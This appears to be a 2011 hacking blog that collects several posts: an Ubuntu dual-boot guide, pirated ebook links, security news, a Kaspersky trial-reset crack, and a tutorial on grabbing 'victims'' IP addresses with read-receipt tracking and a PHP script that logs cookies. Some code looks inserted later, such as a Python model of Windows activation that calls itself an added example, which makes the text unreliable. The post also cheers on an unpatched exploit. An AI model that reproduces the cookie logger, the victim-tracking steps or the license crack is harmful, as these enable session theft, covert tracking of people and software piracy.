Wednesday 23 March 2011

Installing Ubuntu - A tutorial for All





Recently I installed Ubuntu (Linux) as a dual-boot OS alongside Windows 7 ("Seven"), which was already installed on my machine. I faced a lot of problems, but the end result was worth all the trouble, as Ubuntu rocks.

In this post I will describe the step-by-step method to install Ubuntu (or any of its other versions, such as Mint) as a dual-boot OS on a Seven machine. I will also point out some mistakes I made and what I learned from them.

The first step to install Ubuntu was to create a partition on my existing hard drive. There are two ways to do this in Seven:

1. The built-in "Shrink Disc" feature in Seven.
2. A disk partitioning program that does it for you.

Ubuntu and Mint come with a built-in disk partitioner. What is required is unallocated free space on your hard drive, so that it can be partitioned while installing Ubuntu.

1. Making space using the "Shrink Disc" feature in Seven:
a. Log on to Seven.
b. Right-click "My Computer" in the main menu and select "Manage".
c. It will ask for the administrator password; enter it and click "Allow".
d. Click "Disc Management".
e. It will show the available partitions and any external storage devices.
f. Right-click the disc partition you want to shrink and select "Shrink Volume".
g. Seven will assess how much space can be freed.
h. It will suggest the amount that can be freed. Make sure this is at least 10-15 GB. If you don't have this much space, you will have to delete some data to make room for the partition.
i. Then select "Shrink".
j. Seven will shrink the volume and show the newly freed space as "unallocated" space.
k. After this, close the window. You are done with shrinking.

2. Making space using disk partitioning software:
a. I had a problem: Seven kept saying "access denied" when I tried to shrink the main C: drive (I had only one partition).
b. So I used a free disk partitioning program to shrink the space.
c. You can use the following software: EaseUS Partition Master Home Edition, which you can download here:
d. With it, it is easy to create space for a new partition.
e. In the program, select the partition you want to shrink/resize.
f. Using the "Resize" tool you can shrink the volume; the rest of the space will be shown as "unallocated space".
g. Apply the changes and you are done.


The next step is to install Ubuntu.

1. You will need to download the latest ISO for Ubuntu or Mint from here:

2. You will need to burn this ISO image to a CD (700 MB or more).
3. To burn this ISO you will have to use ISO burning software. One such free program is Free ISO Burner:
4. Be sure to burn the ISO image at a very slow speed. This extra time spent will help you install Linux trouble-free.
5. When the disc is ready, restart the computer. Make sure that in the BIOS setup the CD drive is above the hard disc in the boot priority.
6. Once restarted, the disc will boot before the hard disc.
7. In the menu that is displayed, select "Run installer" and follow the instructions.
8. Once you have selected the language, location and keyboard configuration, the Ubuntu disk partitioner will run and show you various options for where Ubuntu should be installed.
9. Select "Largest continuous free space", as this will select the "unallocated space" that we created in the earlier step.
10. After this, follow the remaining instructions to complete the installation.
11. The installer will prompt you to import settings from Seven. Import them if you want to.
12. I preferred not to import, as it copies the documents from the Seven partition to the new Ubuntu partition and just eats up the partition space. You can always access the Seven documents from Ubuntu, as the Seven partition will be shown as a hard disk in "My Computer".
13. Complete the installation. It will prompt you to restart the computer. Do so.
14. After the restart, the boot menu will show Ubuntu and Seven as a dual-boot system, and you are free to choose the OS you want to load.

Thursday 17 March 2011

Hacking Exposed: Web Applications Ebook 3rd Edition

The latest Web app attacks and countermeasures from world-renowned practitioners. Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster
* See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation
* Understand how attackers defeat commonly used Web authentication technologies
* See how real-world session attacks leak sensitive data and how to fortify your applications
* Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques
* Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments
* Safely deploy XML, social networking, cloud computing, and Web 2.0 services
* Defend against RIA, Ajax, UGC, and browser-based, client-side exploits
* Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures

download: Hacking Exposed: Web Applications Ebook 3rd Edition
FileSonic.com     letitbit.net

Monday 14 March 2011

IPAD 2 JAILBROKEN IN JUST ONE WEEK

Hackers have already managed to break open Apple's latest iPad, with developer and hacker Comex saying he had managed to do so remotely over the weekend. While proof of the jailbreak has shown up in photos and video on the Internet, it will not be made available immediately as it must be packaged for public use.

According to talk on Twitter, versions for both the Wi-Fi and 3G models of the iPad could be released shortly, although no specific date for its release has been given.

While the speed of the jailbreak may be surprising, iOS 4.3 (which the iPad runs on) had also been cracked open quickly: hackers there only needed about 24 hours. In that case developers likely had access to beta versions of the operating system, allowing those working on the crack to test out their work before iOS 4.3's actual release.


Details on the actual jailbreak have not been disclosed, probably to prevent Apple from moving quickly to close the hole. "Would've had it yesterday if I didn't have to spend 1.5 days looking for a replacement exploit (which came from a most unexpected place…)," Comex tweeted Sunday.

He also used a friend's iPad nearly 2,500 miles away and jailbroke it remotely, meaning whatever was done to hack the tablet device may be able to be done akin to what the iPhone Dev Team did with jailbreakme.com last August.

As always, jailbreaking any iOS device comes with risks. There is no guarantee that the hack will work on every device, and updates can sometimes cause the hack to stop working. Additionally, Apple's warranty becomes void if a device is jailbroken.

MHTML EXPLOIT LATEST MICROSOFT BUG :P

The latest Microsoft MHTML exploit is in fashion among hackers ;)

Microsoft is investigating new public reports of vulnerability in all supported editions of Microsoft Windows. The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting various Web sites, resulting in information disclosure. This impact is similar to server-side cross-site scripting (XSS) vulnerabilities.



MHTML, or Mime HTML, is a standard that allows web objects such as images to be combined with HTML into a single file. The vulnerability lies in how MHTML interprets Multipurpose Internet Mail Extensions (Mime) for content blocks in a document.

On a Blog post Friday afternoon Google Security Team members said “We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site.”

Microsoft and Google are now working on a server-side fix to reduce the risk from the MHTML vulnerability. In the meantime, you can check whether your machine is vulnerable by using the test scenario previously posted by Microsoft.

As a workaround, users can also disable ActiveX, but this would affect web applications, including banking and e-commerce sites, that use ActiveX to provide online services.
Maybe sad news for normal users, but :D you know what I mean to say: enjoy the exploit, guys, it's not patched yet :P

Saturday 12 March 2011

PWN2OWN OVERVIEW & RESULTS

The Zero Day Initiative team is having the annual Pwn2Own contest March 9th, 10th, and 11th of 2011 in Vancouver. The contest always seems to be an interesting spectacle – seeing how fast certain systems are compromised, learning how companies respond to the vulnerability disclosures, and seeing patches come out up to the very last minute. The targets this year will be 4 popular web browsers and 4 mobile devices.

Browsers

This year the web browser targets will be the latest release candidate (at the time of the contest) of the following products:
  • Microsoft Internet Explorer
  • Apple Safari
  • Mozilla Firefox
  • Google Chrome
Each browser will be installed on a 64-bit system running the latest version of either OS X or Windows 7.
A successful hack of IE, Safari, or Firefox will net the competitor a $15,000 USD cash prize, the laptop itself, and 20,000 ZDI reward points which immediately qualifies them for Silver standing. Benefits of ZDI Silver standing include a one-time $5,000 USD cash payment, 15% monetary bonus on all ZDI submissions in 2011, 25% reward point bonus on all ZDI submissions in 2011 and paid travel and registration to attend the DEFCON Conference in Las Vegas.
As for Chrome, the contest will be a two-part one. On day 1, Google will offer $20,000 USD and the CR-48 if a contestant can pop the browser and escape the sandbox using vulnerabilities purely present in Google-written code. If competitors are unsuccessful, on day 2 and 3 the ZDI will offer $10,000 USD for a sandbox escape in non-Google code and Google will offer $10,000 USD for the Chrome bug. Either way, plugins other than the built-in PDF support are out of scope.

Mobile Devices

The following are the target mobile devices for the contest:
  • Dell Venue Pro running Windows 7
  • iPhone 4 running iOS
  • Blackberry Torch 9800 running Blackberry 6 OS
  • Nexus S running Android
As mentioned previously, we’ve upped the ante this time around and the total cash pool allotted for prizes has risen to a whopping $125,000 USD. While HP TippingPoint is funding $105,000 of that, we’ve partnered with Google who has generously offered up $20,000 to the researcher who can best their Chrome browser.
Interestingly, an RF enclosure box will be used for the mobile targets as there seems to be the possibility that


The Results of Pwn2Own 2011

 Browsers

“Safari goes down first at #pwn2own”
“Stephen Fewer @stephenfewer just successfully compromised Internet Explorer (complete with a Protected Mode bypass) at Pwn2Own.”
The vulnerability exploited in IE8 is not present in IE9, which ships on Monday.
Chrome and Firefox, the other browsers in the contest, went unchallenged.

MOBILE PHONES

The Apple iPhone 4 and RIM’s Blackberry Torch 9800 were both successfully compromised on day 2 of the contest.
The Android and Windows Phone 7 based devices survived the challenge.
A vulnerability in WebKit allowed the Blackberry to be compromised. Google has responded by patching the bug in their WebKit-based Google Chrome.

REPORTS


Ars Technica has good write-ups on Day 1 and Day 2 of Pwn2Own 2011. In those write-ups you’ll find a lot more details of the winners and some of the compromises.


Thursday 10 March 2011

W3af – Web Application Attack and Audit Framework

 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. To read our short and long term objectives, please click over the Project Objectives item in the main menu. This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page .  




 If you are here just to "take a look" please watch the w3af video demos!


A nice tool for checking web applications and a good framework for carrying out your tests. It is to web application testing what Metasploit is to network penetration testing.


The w3af core and its plugins are fully written in Python. The project has more than 130 plugins, which check for SQL injection, cross-site scripting (XSS), local and remote file inclusion, and much more.


This tool lags a bit on Windows, but as it's open source you can't complain :P It runs smoothly on Linux, though.


You can download W3AF here

Mastering the Nmap Scripting Engine-Defcon 18



Most hackers can use Nmap for simple port scanning and OS detection, but the Nmap Scripting Engine (NSE) takes scanning to a whole new level. Nmap's high-speed networking engine can now spider web sites for SQL injection vulnerabilities, brute-force crack and query MSRPC services, find open proxies, and more. Nmap includes more than 130 NSE scripts for network discovery, vulnerability detection, exploitation, and authentication cracking.

Rather than give a dry overview of NSE, Fyodor and Nmap co-maintainer David Fifield demonstrate practical solutions to common problems. They have scanned millions of hosts with NSE and discuss vulnerabilities found on enterprise networks and how Nmap can be used to quickly detect those problems on your own systems. Then they demonstrate how easy it is to write custom NSE scripts by writing one from scratch and using it to hack a webcam. All in 38 minutes, as given live at Defcon 18!

Tuesday 8 March 2011

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)

This 25th anniversary edition of Steven Levy’s classic book traces the exploits of the computer revolution’s original hackers, those brilliant and eccentric nerds from the late 1950s through the early ’80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zuckerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as “the hacker ethic,” that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today’s digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.

About the Author
Levy is a senior writer for Wired. Previously, he was chief technology writer and a senior editor for Newsweek. Levy has written six books and has had articles published in Harper’s, Macworld, The New York Times Magazine, The New Yorker, Premiere, and Rolling Stone. Steven has won several awards during his 30+ years of writing about technology, including for Hackers, which PC Magazine named the best Sci-Tech book written in the last twenty years, and Crypto, which won the grand eBook prize at the 2001 Frankfurt Book Festival.

Download: http://www.megaupload.com/?d=GZQ2G2F0
http://depositfiles.com/en/files/f3canuqmj

Monday 7 March 2011

METASPLOIT v 3.6 RELEASED

All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.

This release adds 15 new exploits for a total of 64 new modules since version 3.5.1. All editions of Metasploit now include Post Exploitation modules that provide local exploits and additional data gathering capabilities.


Metasploit Express and Metasploit Pro users benefit from the Project Activity Report and Global Search capabilities now available in the user interface. Metasploit Pro users now have access to the new Pro Console, PCI Report, and Asset Tagging features. The full release notes for the open source framework can be found online here  

GNACKTRACK R6

GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME!

This version patches the compat-wireless modules, providing better support for injection and monitor mode. A Windows XP styled theme has also been included, allowing you to quickly emulate a Windows XP box!



R6 is the most recent version of GnackTrack.

You can download GnackTrack R6 here

Saturday 5 March 2011

Hacking A Biometric System



Description: This paper was presented at nullcon 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

SAMURAI Web Testing Framework



Samurai is a LiveCD focused on web application testing. It comes with the top testing tools pre-installed, to build the perfect environment for testing applications.



This Linux distribution is designed especially for the many people who are interested in web application hacking.



I had some problems installing it on VMware, but installing it on the HD was smooth :)


You can download Samurai Linux here

KASPERSKY-2011 LICENSE FOREVER

After this tut you will be able to use your KASPERSKY-2011 forever!

1. Download the Kaspersky trial version.


Now go to Settings, then select Options, uncheck "Enable Self Defense" and click OK.


Now right-click the Kaspersky icon in the taskbar and click "Exit".


Go to Run and type "regedit".

Now go to HKEY_LOCAL_MACHINE\SOFTWARE\KASPERSKYLAB\PROTECTED\AVP11\ENVIRONMENT

On the right-hand side you can see PCID. Double-click it and change the last two characters before the closing curly bracket, then click OK. E.g. if the last two characters are "D7", change them to "F9".



Now open Kaspersky again, select "Activate Trial License" and click Next.


Now enable Self-Defense, and KASPERSKY-2011 LICENSE FOREVER.

AFTER ONE MONTH, REPEAT THE SAME PROCESS AGAIN..:)

Wednesday 2 March 2011

HOW TO GET AN IP ADDRESS EASILY

I have been getting requests saying that the content we are posting is not easy for beginners. I was a little disappointed by such reviews, so here we go: a simple yet effective post about the very basics of the internet and networking, the IP address.




What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted quad') and look something like 112.123.123.121 (this is an example of an IPv4 address).


What can be done with an IP address?

The IP address is the very basic unit before you start a hack; it's basically used for fingerprinting and tracing, and if the victim is weak it won't take 10 seconds to penetrate through a vulnerability :)




HOW can I get an IP address?

It's an easy task to get your own as well as others' IP addresses.
To get your own IP address, just go to this website


How to get the IP of a website?
Go to the shell (command prompt) and just type ping www.target.com
and it will start showing numbers, just like in this picture


How to get IP address of friends or victims?

Using E-mail receipts


An e-mail receipt is a kind of notification you get as an e-mail when someone opens (reads) the mail you sent.


This notification consists of:
  • the IP address of the mail reader.
  • the time and date the mail was read.
  • the name and version of their browser.
You need to follow these steps:


a. Step 1:-


Visit ReadNotify and sign up there. You can use your Gmail, Yahoo, Hotmail, Rediff or any other e-mail ID. They give free trials for 2 weeks or 25 e-mails, whichever comes first.


b. Step 2:-


Let's say you used your e-mail ID example@gmail.com to register on readnotify.com; then log in to your e-mail account first.


c. Step 3:-


Click on the "Compose mail" menu and in the "To:" field write the e-mail ID of the culprit followed by .readnotify.com, so the complete e-mail address would be like victim@gmail.com.readnotify.com.
The rest is just the normal e-mail procedure.

d. Step 4:-
You are done; just wait for the victim to open that e-mail and voilà, you will get the details.

Using PHP scripts

Here is the basic PHP script:
<?php
// Optional value passed in the URL as ?c=... (empty if absent, which avoids an undefined-index notice)
$cookie  = isset($_GET['c']) ? $_GET['c'] : '';
// Visitor's IP address, the current date/time and the page that linked here
$ip      = getenv('REMOTE_ADDR');
$date    = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
// Append one record to file.txt (the file must already exist and be writable by the web server)
$fp = fopen('file.txt', 'a');
// htmlspecialchars() escapes the visitor-controlled values, since file.txt is written as HTML
fwrite($fp, 'Cookie: ' . htmlspecialchars($cookie) . '<br> IP: ' . $ip . '<br> Date and Time: ' . $date . '<br> Referer: ' . htmlspecialchars((string) $referer) . '<br><br><br>');
fclose($fp);
// Redirect the visitor elsewhere (the original was missing the semicolon here, a syntax error)
header("Location: http://google.com/");
exit;
?>
Process: save it on your hosting (Ripway, my3gb, BlackAppleHost etc.) and don't forget to create a file.txt file, which will save all the IPs.

This will save IPs with the date, time and where the link came from, and you can redirect to another URL, just like I redirected to Google, in a matter of seconds.

The upcoming post will be on fingerprinting with an IP address, so we can work with a flow.

Do share your views on this post; I tried to keep it simple.

How Windows Product Activation Works


Windows Product Activation, or WPA, is a license validation procedure introduced by Microsoft Corporation in all versions of its Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well.


WPA requires each end user to activate their copy of Windows, so as to prevent unauthorized usage beyond a specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.

In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind activation is to limit the usage of its Windows operating system to only the one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands activation of the product within 30 days of its installation, so as to ensure that it is genuine.

What does “Genuine Windows” mean?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you transmit an Installation ID code to Microsoft, either by phone or over the Internet depending on the activation method you choose. Based on this, Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is found to be genuine, the system receives an Activation ID, which completes the activation process. If the activation is done by telephone, the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

The Installation ID is a 50-digit number derived from the following two pieces of data.

1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.

2. Hardware ID – This value is derived based on the hardware configuration of your computer.

The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

* Display Adapter
* SCSI Adapter
* IDE Adapter (effectively the motherboard)
* Network Adapter (NIC) and its MAC Address
* RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
* Processor Type
* Processor Serial Number
* Hard Drive Device
* Hard Drive Volume Serial Number (VSN)
* CD-ROM / CD-RW / DVD-ROM

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.

The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.

However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:

During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.

Thus for a successful activation, either of the following two cases must be satisfied:

1. The product key is being used for the first time, i.e. it has not been used for earlier activations on any other computer.

2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What if I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.
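The activation rules described above (first use of a key pairs it with the Hardware ID; later activations succeed only if at least 7 of the 10 hardware categories still match) can be followed through in code. The block below is an added example written for this page, not Microsoft's algorithm or any real WPA data format: the real Hardware ID is a hashed value, whereas this model stores each category as a plain string, the key names, the `ActivationServer` class and the `KEY-A` product key are all constructed for illustration, and the Installation ID is represented simply as the (product key, Hardware ID) pair it is derived from.

```python
# The ten hardware categories the text lists as inputs to the Hardware ID.
HARDWARE_CATEGORIES = (
    "display_adapter", "scsi_adapter", "ide_adapter", "nic_mac_address",
    "ram_range", "processor_type", "processor_serial", "hard_drive_device",
    "hard_drive_vsn", "optical_drive",
)
# "At least 7 of the 10 categories should be the same" (rule quoted from the text).
MIN_MATCHING_CATEGORIES = 7


def sample_hardware(**changes):
    """Constructed Hardware ID for one machine; keyword arguments override categories.
    Real WPA hashes these values; using plain strings is an assumption of this model."""
    hw = {cat: "base-" + cat for cat in HARDWARE_CATEGORIES}
    hw.update(changes)
    return hw


def matching_categories(stored, current):
    """Count how many of the ten categories agree between two Hardware IDs."""
    return sum(1 for cat in HARDWARE_CATEGORIES if stored.get(cat) == current.get(cat))


class ActivationServer:
    """Toy model of the licensing server's decision (hypothetical, not Microsoft's system)."""

    def __init__(self):
        # product key -> Hardware ID recorded at that key's first activation
        self._pairings = {}

    def activate(self, product_key, hardware_id):
        """Return ('activated', matches) or ('rejected', matches) for one activation attempt."""
        if product_key not in self._pairings:
            # Case 1: first use of the key; pair it with this hardware and accept.
            self._pairings[product_key] = dict(hardware_id)
            return ("activated", len(HARDWARE_CATEGORIES))
        # Case 2: key seen before; accept only if enough of the hardware still matches.
        matches = matching_categories(self._pairings[product_key], hardware_id)
        if matches >= MIN_MATCHING_CATEGORIES:
            return ("activated", matches)
        return ("rejected", matches)


def walkthrough():
    """Run the scenarios from the text and return their outcomes in order."""
    server = ActivationServer()
    original = sample_hardware()
    results = []
    # First activation after purchase: key unseen, so it is paired and accepted.
    results.append(server.activate("KEY-A", original))
    # Reformat and reinstall on the same machine: same key, same hardware, accepted again.
    results.append(server.activate("KEY-A", original))
    # Three categories changed (new NIC, more RAM, new DVD drive): 7 of 10 still match.
    upgraded3 = sample_hardware(nic_mac_address="new", ram_range="new", optical_drive="new")
    results.append(server.activate("KEY-A", upgraded3))
    # Four categories changed: only 6 match, so online activation fails (phone call needed).
    upgraded4 = sample_hardware(nic_mac_address="new", ram_range="new",
                                optical_drive="new", processor_type="new")
    results.append(server.activate("KEY-A", upgraded4))
    # The same key on a completely different machine: the pirated-copy case, 0 matches.
    other = {cat: "other-" + cat for cat in HARDWARE_CATEGORIES}
    results.append(server.activate("KEY-A", other))
    return results


if __name__ == "__main__":
    for step, (decision, matches) in enumerate(walkthrough(), 1):
        print(f"step {step}: {decision} ({matches}/10 categories match)")
```

Running the script prints five lines: the first three attempts are activated (10, 10 and 7 matching categories), the fourth and fifth are rejected (6 and 0 matches). Note that the model keeps the pairing recorded at first use and never updates it, which is all the text states; whether the real server re-pairs the key after a successful activation on changed hardware is not described on this page.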

Some things WPA does not do

* WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
* If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
* WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
* WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.